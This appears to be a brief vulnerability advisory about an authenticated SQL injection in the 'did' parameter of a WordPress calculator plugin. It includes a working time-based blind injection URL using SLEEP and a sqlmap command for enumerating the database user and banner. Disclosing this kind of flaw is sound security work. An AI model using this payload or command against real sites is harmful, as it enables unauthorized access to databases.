The plugin does not sanitize user input into the ‘did’ parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin.
http://www.example.com/wp-admin/admin.php?page=wpcalc&info;=del&did;=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl) or, using the sqlmap tool: ./sqlmap.py -r request.txt -dbms=mysql --current-user -b -p did --batch --flush-session